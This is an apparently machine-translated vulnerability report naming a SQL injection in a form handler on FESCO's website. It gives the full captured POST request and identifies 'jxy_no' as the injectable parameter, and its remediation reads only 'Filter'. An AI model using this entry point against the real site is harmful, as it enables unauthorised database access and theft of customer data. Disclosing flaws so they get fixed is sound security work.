Beijing Foreign Company Human Resources Service Co., Ltd. SQL Injection

Beijing Foreign Company Human Resources Service Co., Ltd. SQL Injection

Founded in 1979, Beijing Foreign Company Human Resources Service Co., Ltd. (hereinafter referred to as FESCO) is the first company in China to provide professional human resources services for foreign representative institutions in China, foreign financial institutions and economic organizations, with a long history of professional human resources services, rich market experience, and complete service qualifications, multinational corporations are the first choice of strategic human resources partners in China, it is the most competitive and brand value enterprise in China's human resources industry and one of the top 500 enterprises in China.

As the leader in China's human resources service industry, FESCO serves more than 20 thousand customers from hundreds of countries and regions, as well as more than 130 Chinese and foreign employees working in these institutions. The customer includes many internationally renowned multinational enterprises, three-capital enterprises, state-owned enterprises, and private enterprises, covering communication, electronics, IT, automobile, petrochemical, pharmaceutical, finance, fast moving consumer goods, and other industries.

POST injection:

POST/vip/salon/baoming. asp http/ 1.1

Accept: text/html, application/xhtml + xml, image/jxr ,*/*

Referer: http://www.fesco.com.cn/vip/salon/baoming.asp

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv: 11.0) like Gecko

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Content-Length: 237

Host: www.fesco.com.cn

Pragma: no-cache

Cookie: CNZZDATA1000501355 = 1887299462-1447460014-http % 253A % 252F % 252Fjob.fesco.com.cn % 252F % 7C1447460014; ASPSESSIONIDCCTCRTQB = listen; Limit = 1447460011

Submit = % cc % e1 % bd % bb & jxy_company = Acunetix & jxy_dept = 1 & jxy_mail = sample % 40email. tst & jxy_mobi le = 987-65-4329 & jxy_name = csqctcgn & jxy_no = 1 & jxy_request = 1 & jxy_xingzhi = % b9 % fa % c6 % f3 & jxy_yewubu = 0

Injection parameter: jxy_no

Database:

Database Table:

Database explosion:

Solution:

Filter.